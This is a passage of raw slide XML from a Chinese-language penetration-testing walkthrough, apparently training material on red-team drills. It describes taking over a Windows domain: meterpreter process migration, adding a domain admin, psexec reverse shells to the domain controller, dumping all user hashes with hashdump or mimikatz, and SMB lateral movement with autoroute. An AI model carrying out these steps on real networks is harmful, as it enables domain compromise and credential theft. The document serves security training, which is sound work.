              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>PS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>命令找到域管理所在的进程，把</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t> shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>进程迁移到此进程中，成功后就获得了域管理权限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>（也可使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1"/>
              <a:t>icognito</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>模块</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pP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 descr="mark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08489" y="2564505"/>
            <a:ext cx="5274310" cy="84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mark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08489" y="3688080"/>
            <a:ext cx="4054475" cy="44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mark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08489" y="5140960"/>
            <a:ext cx="4054475" cy="139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Step4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>获取域管</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>权限</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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600" dirty="0"/>
              <a:t>在获取到域管理员权限之后，尝试登陆域控</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="16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600" dirty="0"/>
              <a:t>定位域控主机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>在一个简单的内网环境中，时间服务器一般为域控</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>服务器</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="16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600" dirty="0"/>
              <a:t>可以看到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>域服务器的主机名为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>PAVMSAD64,IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>地址为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>10.51.0.63</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN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8" name="图片 7" descr="mark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23243" y="2640359"/>
            <a:ext cx="5106670" cy="1569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-862757" y="482612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zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>再次尝试使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>IPC$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>来获取域控服务器权限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>但域控服务器为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Windows Server 2012</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，已经弃用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>命令，改用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>schtasks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43" y="4904982"/>
            <a:ext cx="4676190" cy="5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83" y="5643646"/>
            <a:ext cx="5685714" cy="933333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Step4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>获取域管</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>权限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1400" dirty="0"/>
              <a:t>IPC$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>攻击不成功，但是有域管理员权限，直接添加一个域管理员账号</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pP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84" y="2260213"/>
            <a:ext cx="6314286" cy="1923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84" y="4265303"/>
            <a:ext cx="6038095" cy="2423153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Step5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>：登陆</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>域</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>控制器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zh-CN" sz="1400" dirty="0"/>
              <a:t>接下来登陆域控，抓域控的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0"/>
              <a:t>HASH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0"/>
              <a:t>常见</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>的登录域控的方式有以下几种</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN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zh-CN" sz="1600" dirty="0"/>
              <a:t>端口转发或者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t> socks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>登录域控远程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>桌面</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="16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zh-CN" sz="1600" dirty="0"/>
              <a:t>登录对方内网的一台电脑使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>psexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>来反弹</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>shell </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="16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zh-CN" sz="1600" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>下面的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>psexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>或者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>smb_login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>来反弹</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>这里采用最常见，也是效果最好的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1"/>
              <a:t>psexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>来反弹</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>shell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 descr="mark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2079" y="3727131"/>
            <a:ext cx="5374641" cy="272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Step5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>：登陆</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>域</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>控制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>器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1600" dirty="0"/>
              <a:t>拿到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>之后，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>先</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>迁移</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>到系统稳定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>进程，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>查看</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>域</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>控的系统信息和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>当前存活的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>sessions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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 descr="mark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87807"/>
            <a:ext cx="375285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mar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0766" y="2688174"/>
            <a:ext cx="5293234" cy="1799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0" y="5017630"/>
            <a:ext cx="9144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右</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>图所示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>现阶段</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>控制的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>共有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>个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en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>session1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>webshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>反弹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r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>session2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>是利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>ipc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>入侵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r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>session3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>是系统权限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>shell;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>session4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>为域</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>管在线</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>服务器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>shell;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>session5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>域</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>控制器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>整个渗透过程，一环套一环，环环相扣，缺一不可！</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400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Step5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挖掘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>域</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>控制器价值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1600" dirty="0" smtClean="0"/>
              <a:t>获取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>域内的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>全部用户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>HASH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>，方法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>如下</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600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zh-CN" sz="1600" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>自带的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>dumphash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>或者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>smart_hashdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>模块来导出用户的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>hash</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="16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powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>利用模块直接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>导出</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="16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wce,mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>等</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>工具</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>此处</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>自带的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>dumphash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>来抓取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>权限必须为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>SYSTEM)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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7" name="图片 6" descr="mark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9768" y="3749063"/>
            <a:ext cx="61054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Step6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>SMB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>迅速扩张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zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>具体</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>如下：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zh-CN" sz="1600" dirty="0"/>
              <a:t>利用当前获取到的域控账户密码，对整个域控</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>段进行扫描。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zh-CN" sz="1600" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>下的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>smb_login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>模块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zh-CN" sz="1600" dirty="0"/>
              <a:t>端口转发或者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>SOCKS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>代理进内网</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>在对内</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>网进行扫描之前</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>，可在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>中添加</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>路由，让渗透主机接入内网</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1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502" y="3923418"/>
            <a:ext cx="4880343" cy="19870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4332171"/>
            <a:ext cx="450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1600" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>autoroute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>快速添加路由表</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>meterpreter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&gt; run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>autoroute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t> -s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>10.51.0.0/24</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>查看当前已添加的路由表</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>meterpreter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&gt; run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>autoroute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t> -p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国内外重大攻防演习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北约“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Locked Shields</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>”、“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Crossed Swords</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>”系列演习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国内“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>HW</a:t>
            </a:r>
            <a:r>
